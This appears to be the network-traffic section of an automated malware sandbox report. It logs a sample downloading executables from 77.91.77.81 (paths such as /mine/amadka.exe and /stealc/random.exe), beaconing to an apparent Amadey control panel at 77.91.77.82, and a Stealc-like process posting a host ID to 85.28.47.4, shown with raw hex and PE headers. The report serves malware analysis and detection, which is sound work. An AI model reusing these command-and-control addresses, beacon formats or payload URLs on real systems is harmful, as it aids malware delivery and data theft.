                                                                Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 63 33 4c 6a 6b 78 4c 6a 63 33 4c 6a 67 78 4c 32 31 70 62 6d 55 76 59 57 31 68 5a 47 74 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 47 68 30 64 48 41 36 4c 79 38 33 4e 79 34 35 4d 53 34 33 4e 79 34 34 4d 53 39 6a 62 33 4e 30 4c 32 64 76 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 41 3d 3d
                                                                Data Ascii: aHR0cDovLzc3LjkxLjc3LjgxL21pbmUvYW1hZGthLmV4ZXwwfDB8fGh0dHA6Ly83Ny45MS43Ny44MS9jb3N0L2dvLmV4ZXwwfDB8fA==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.64971377.91.77.81802104C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:23.449083090 CEST77OUTGET /mine/amadka.exe HTTP/1.1
                                                                Host: 77.91.77.81
                                                                Cache-Control: no-cache
                                                                Jul 3, 2024 08:38:24.162043095 CEST1236INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:24 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 1925632
                                                                Last-Modified: Wed, 03 Jul 2024 05:30:46 GMT
                                                                Connection: keep-alive
                                                                ETag: "6684e206-1d6200"
                                                                Accept-Ranges: bytes
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 10 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELafL@@Ln@XlKK @.rsrc@.idata @ +@wiqvgckmP1J@emtqvjqaL<@.taggant0L"@@
                                                                Jul 3, 2024 08:38:24.162075996 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 3, 2024 08:38:24.162087917 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 3, 2024 08:38:24.162173033 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 3, 2024 08:38:24.162185907 CEST1236INData Raw: ea 00 02 27 b0 ec 4b c4 59 9c 18 91 c8 fc 26 49 4f fd a2 d5 d2 b5 69 cc 40 84 95 20 ee 00 c2 26 70 60 73 bd fc 8c d7 26 58 11 95 53 d1 ec 24 26 59 c0 0b 26 7c 0f 65 33 d1 4c 5b 7d 45 80 b3 14 80 60 17 30 0a eb 72 14 90 64 ac 5e 23 dc 07 09 e0 a4
                                                                Data Ascii: 'KY&IOi@ &p`s&XS$&Y&|e3L[}E`0rd^#Smd4n[$P!l@@&$%~OIb%1PKF +t"rD&0`s}&$c]t2!C4&D[P"l[Glt}s@O``s%
                                                                Jul 3, 2024 08:38:24.162197113 CEST1236INData Raw: d4 c2 69 88 e0 31 9b 89 04 62 75 d4 da 64 67 10 d0 a0 2e c1 88 e9 bd 07 83 ee f5 3c 1a 5a a7 fc b7 4b 31 2f 2a 78 5e 10 28 84 60 94 6b dd 34 d1 d4 ea a7 8f ac 32 b4 79 cc 61 49 d5 c5 0f 62 c4 1e 39 16 34 89 86 6b d3 d9 2f d3 cb 81 f2 15 80 c2 58
                                                                Data Ascii: i1budg.<ZK1/*x^(`k42yaIb94k/X]435Z{[o78;lG"#6`c*[J6As&0|,o`_7c]Z-gH0jn$iS EbLc)[UBb?;gH<}g
                                                                Jul 3, 2024 08:38:24.162208080 CEST776INData Raw: c2 94 af 25 f3 09 43 e7 11 c6 bf 0d 24 66 eb 4c c2 d8 3b 51 58 24 29 d5 87 b0 db 6c 8c a6 65 18 05 eb a3 b6 86 e2 d9 e8 39 dd dc 24 01 60 13 7a d6 d5 7e d3 d4 fd a0 10 a8 2a a8 5e 1f cc 19 c0 00 a6 2e 4f b4 86 31 f6 c1 71 fe 31 95 90 4f 23 11 a7
                                                                Data Ascii: %C$fL;QX$)le9$`z~*^.O1q1O#'RBho)^$]B5B-F[P!$3bzdy45JOoE?s-Q{92tHsmLbFQ#mccZ-g>YRY^.T6I
                                                                Jul 3, 2024 08:38:24.162219048 CEST1236INData Raw: 30 ec db 8b 50 f0 34 58 93 59 97 dd 57 5f 34 78 cc 32 b3 6d a7 6c ae 08 35 bc 3b 34 56 67 6f 28 fa 4a 35 48 fc dc c6 55 f3 ae 09 46 cf 15 8b 32 ca cb 23 2f 81 93 da f5 ab fc b6 d6 52 41 9e 0b c3 2c 9d 08 43 54 f6 9e b6 ee 76 57 00 72 73 8d e6 80
                                                                Data Ascii: 0P4XYW_4x2ml5;4Vgo(J5HUF2#/RA,CTvWrs*-NS>va-2VLVPDsFlyJ|Sc~AaX?Pj0Ke|]q>',i5K%RPGtQmHgI!x2zEq(9^J~Urx{
                                                                Jul 3, 2024 08:38:24.162383080 CEST1236INData Raw: 12 e0 14 f9 91 6f e5 14 63 bc 04 a5 4a e7 81 55 df da 6e 52 a6 32 e7 72 39 3f 4c fd cf 67 37 fb 9c 7b 3c cf 6d 0b d0 ee 4e 9c 9c b8 28 23 69 96 c8 89 fb 4d 50 48 7a 9f 4a 72 57 ae 62 79 5a 08 4b 7a ff 48 45 b7 d7 55 09 50 96 15 11 df 3f d0 d4 31
                                                                Data Ascii: ocJUnR2r9?Lg7{<mN(#iMPHzJrWbyZKzHEUP?1bUWgl>r6$%#p4$rc}IACc?_^t{S?,5!$+SC_Q-{,HV7Rp2mOAl)Vn<5XUjl
                                                                Jul 3, 2024 08:38:24.162395000 CEST1236INData Raw: 50 1f 9e 4e 88 e5 a3 95 18 3a ed 24 d0 f0 d4 bc 0d 68 f4 53 bf 4b 63 89 2b fe 94 24 ec 20 95 be dd c7 66 e5 fb 9b 5f 46 3e 5a 58 88 ed 67 1d f3 6a 99 6d 45 b4 1a b5 6a 50 d2 93 c6 ab 0a 93 91 a2 59 10 c2 2a 02 fe 1b df 61 b1 ed 30 8d 31 3f da 06
                                                                Data Ascii: PN:$hSKc+$ f_F>ZXgjmEjPY*a01?$\zwn\MFXAQvT{$Uo5H#9O`r!q.-<ZUx*WJ_}\5HXQ1Sls.T*SSRKe/-py=?_jK
                                                                Jul 3, 2024 08:38:24.167597055 CEST1236INData Raw: 0e ec 66 75 5c ef 80 86 5e 4c a3 01 11 ec f3 8c 44 2b d5 69 9a 1d 48 42 ab 55 6a 04 8f d3 24 8e 1d d8 76 11 2e 68 6e da cc b7 66 ea c3 52 1d 0a 33 e0 db 59 8c 6d 3c 1a 40 5c 80 85 82 54 f7 6e 97 71 58 6c c3 fa 4e e2 c7 59 5a 8f 3b e4 75 92 67 37
                                                                Data Ascii: fu\^LD+iHBUj$v.hnfR3Ym<@\TnqXlNYZ;ug7_ea2!eSLA*w2as.(,i``!$E}H" {,S`2uoaLyd|K|G#]S7)"Dh&o


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.64972477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:33.325699091 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:34.001858950 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:34.002868891 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:34.217519045 CEST283INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 35 64 0d 0a 20 3c 63 3e 31 30 30 30 30 30 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 62 30 64 35 64 61 32 63 38 35 30 36 37 33 62 35 64 37 36 61 63 31 63 65 38 63 63 64 34 61 36 65 37 66 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 5d <c>1000006001+++b5937c1a99d5f9db0d5da2c850673b5d76ac1ce8ccd4a6e7f1fbd97e9c4543b31de15441#<d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.64972577.91.77.81801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:34.228379965 CEST54OUTGET /stealc/random.exe HTTP/1.1
                                                                Host: 77.91.77.81
                                                                Jul 3, 2024 08:38:34.924206972 CEST1236INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:34 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 2523648
                                                                Last-Modified: Wed, 03 Jul 2024 04:16:16 GMT
                                                                Connection: keep-alive
                                                                ETag: "6684d090-268200"
                                                                Accept-Ranges: bytes
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 41 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 c8 e8 be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 bf 00 00 04 00 00 00 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$JdZaaa5ZaaRichPELAf!@@ w@@@0!@@Pp# @x#(@.dataP"N"4@
                                                                Jul 3, 2024 08:38:34.924228907 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 93 51 0f b6 b5 8b a9 f3 f8 b1 02 2c 13 47 28 c3 29 1d 88 3b 52 ca e8 79
                                                                Data Ascii: Q,G();Ry4/F6X!v,mHj'd+uT=BSt#|"DK3[H._(tU\^ouI[J[*7{at9o{5>+FdPjG@$
                                                                Jul 3, 2024 08:38:34.924241066 CEST1236INData Raw: f3 df 45 63 b9 4c af 19 3c 2c 2a b6 99 cf 72 c8 56 b8 6b 85 72 f8 6e a3 7c 47 e8 f2 6b b9 9c f3 f4 4c 38 59 32 63 2d d6 dd 7e 59 ea d8 9b e1 0a da b3 06 e1 ba c5 f4 a1 2f 76 ac ba 83 8b ec fe 10 d8 34 93 54 53 2c 33 a4 83 13 e7 77 e3 10 d2 e4 ad
                                                                Data Ascii: EcL<,*rVkrn|GkL8Y2c-~Y/v4TS,3wkgCJG2Pub,jcz >D$jM<1Z& OZ+$iuj[!>D=8LL>> lHrDS3%yS>lC
                                                                Jul 3, 2024 08:38:34.924269915 CEST1236INData Raw: 2d d3 fa 28 bd e5 fd 95 35 e5 15 c0 9f b0 83 aa ef 19 e0 b8 83 58 cf aa 78 be 85 d5 f2 15 1c de d0 12 29 0d 07 1f 9b 0e 6f 9b fe 6e 76 c8 7f 7e 3f f7 f8 f4 37 eb 6c cc ed b5 ed 87 4e 04 93 23 2c 38 75 69 20 12 d7 af 89 05 86 4e 4d 84 73 c1 71 2a
                                                                Data Ascii: -(5Xx)onv~?7lN#,8ui NMsq*}"QJpNct|PGx`~1!.Sr`(: xd}g8~wR;amy{%@'3tbj} <Ci5i>l.
                                                                Jul 3, 2024 08:38:34.924282074 CEST896INData Raw: 5b 11 d5 54 79 c8 16 56 75 11 af 45 be cf 4a 40 1b 19 a1 af 34 a7 d8 6c 3a 7c bf a8 7c 37 4c 93 8a 9f ae 85 e3 d2 e2 a8 95 a9 be 94 cc 99 27 be e9 be 9e cb ce 22 2f 40 94 1a 0f 97 2f f0 7d f6 2c 65 cb 87 c7 34 20 14 2a 0e 0a 5f cf 2d 3b 27 be 0f
                                                                Data Ascii: [TyVuEJ@4l:||7L'"/@/},e4 *_-;'w1b[4)>Q4LSc_/& #U;K\m{J=6%:kBZG5?iyy68bFlOD_@/\&IYG@39#;/<`G#
                                                                Jul 3, 2024 08:38:34.924293041 CEST1236INData Raw: 8d 96 42 41 b3 d5 10 b3 6c a8 ac 26 df f2 63 8f f2 b4 9e fd af 16 7c 7f 31 2b c2 df f8 60 70 7b f1 c4 bb 57 ae 87 99 a1 2b 2b 96 80 f9 8c 2f cb e3 af 88 7d 54 68 06 eb da 66 5a 1b c1 3e f0 6d 33 4d 5b 06 0f 37 96 7a be df 64 d7 e8 48 7f bb a6 41
                                                                Data Ascii: BAl&c|1+`p{W++/}ThfZ>m3M[7zdHAA={DERnw$Bd!u3K]/&~mvW^q6*)X_"/)Wy&gR+J-Yg {HM._r@Ge~_l=P
                                                                Jul 3, 2024 08:38:34.924415112 CEST1236INData Raw: 25 88 4a 31 33 9d 85 fd cc 86 a9 db 0c 6f 88 85 e5 35 da d9 ca 6e 77 77 d9 8d da 91 93 38 42 84 cc 92 13 4e 66 27 4b c6 be b4 04 37 f4 f3 d0 1a af 7a bb 27 e0 bd 72 a6 ff ca d2 d4 0f 70 53 a8 b6 d0 68 05 b9 28 4b c2 75 04 8e b5 9b ef b9 07 22 e7
                                                                Data Ascii: %J13o5nww8BNf'K7z'rpSh(Ku"ZBE5Nb6)S.LVp{G?M{rd[,!I9*AOt+`Vy&P-k;OD@eAFS$=W<#Nke
                                                                Jul 3, 2024 08:38:34.924426079 CEST1236INData Raw: 82 40 18 2b c5 08 c4 9b 37 4f b8 80 ea 02 e3 04 9e f5 ec 76 ea 8e 73 22 b0 a1 6b 04 8b 02 99 af 4c 22 d1 7a 50 ff a4 41 ea 50 d2 2a 85 c3 3b 8b c1 3c 12 c2 27 ba 7e e9 f9 11 a8 17 24 52 58 09 04 a5 ea 7d c3 fd e3 5b 60 1c 79 8f af 66 f2 95 be 32
                                                                Data Ascii: @+7Ovs"kL"zPAP*;<'~$RX}[`yf2Y'ppR&Sx1'MoniVpE65FI01`M$<u%AQiR-?fY~aMI""XBBJtQ/HiOF
                                                                Jul 3, 2024 08:38:34.924437046 CEST1236INData Raw: a1 d2 9a 63 63 bb 33 0d 44 80 9e 1d 6d 75 7d df 0d e6 48 73 65 4e 76 63 65 a8 ac f5 0f 1c 61 ba 69 62 4d ea b7 18 2f be ad 58 da a1 07 b4 d7 bd 9e 38 0f cb 08 04 71 0a ba 3e 57 65 e8 c8 70 43 37 d9 05 1b be eb e6 ba 9d 9a 43 23 43 80 91 22 71 5f
                                                                Data Ascii: cc3Dmu}HseNvceaibM/X8q>WepC7C#C"q_<X;+t{N==]XD$_,x]T5@%wd;4QBimr)d0"<,R73)F.](Yy|$V/mlW
                                                                Jul 3, 2024 08:38:34.924448013 CEST328INData Raw: e3 0b f3 7d 42 42 f5 a5 77 49 0e 22 48 2e 45 ae a6 f2 6c aa 8f 2e 8c 7c b8 8e 55 c9 88 4e 18 47 58 80 5b 7c 19 cf bd 80 ce 45 62 2a 9f df c9 7a e2 b0 97 d2 d9 a8 ee fb cb 16 df 40 76 3f dc d0 6e 75 94 45 b3 8c ca dd 41 6a 3e bd 7a 4f 05 58 1a 57
                                                                Data Ascii: }BBwI"H.El.|UNGX[|Eb*z@v?nuEAj>zOXW;p(wL`6Tj-$([Y{q79*c@Bw*fT?%$b3FSF+w`caMqv9+h@K
                                                                Jul 3, 2024 08:38:34.929441929 CEST1236INData Raw: 6b 9e db c7 58 28 ce bd a9 f1 eb ac 83 14 0a 6a aa 8a 60 54 fa ec d6 0d 37 60 a3 a5 a8 27 34 78 19 f0 9d 92 35 9b 62 13 10 43 8a 49 ae 7b 97 af f8 3e 0a 21 85 e6 07 1d b7 b3 ee 6b 60 d4 0f bd 6c 22 41 d7 8a 4c a8 54 76 b5 1e e6 82 9a 2b 35 8f 25
                                                                Data Ascii: kX(j`T7`'4x5bCI{>!k`l"ALTv+5%K9~U=cD-$r*7H=iT'4=X.?vxqu,t&$X|hS*9l4k @3Uc01>e)>PP|beMeZuh


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.64972777.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:38.177200079 CEST179OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 31
                                                                Cache-Control: no-cache
                                                                Data Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                Data Ascii: d1=1000006001&unit=246122658369
                                                                Jul 3, 2024 08:38:38.869559050 CEST193INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 4 <c>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.64972885.28.47.4807292C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:38.306242943 CEST408OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD
                                                                Host: 85.28.47.4
                                                                Content-Length: 211
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 35 35 43 34 37 42 36 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 2d 2d 0d 0a
                                                                Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="hwid"E8855C47B6BC4158135236------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="build"jony------FCAAEBFHJJDAAKFIECGD--
                                                                Jul 3, 2024 08:38:38.914588928 CEST211INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:38 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 8
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 59 6d 78 76 59 32 73 3d
                                                                Data Ascii: YmxvY2s=


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.64972977.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:38.989955902 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:39.682209969 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:39.683696985 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:39.905415058 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.64973077.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:40.028215885 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:40.714829922 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:40.715784073 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:40.931395054 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
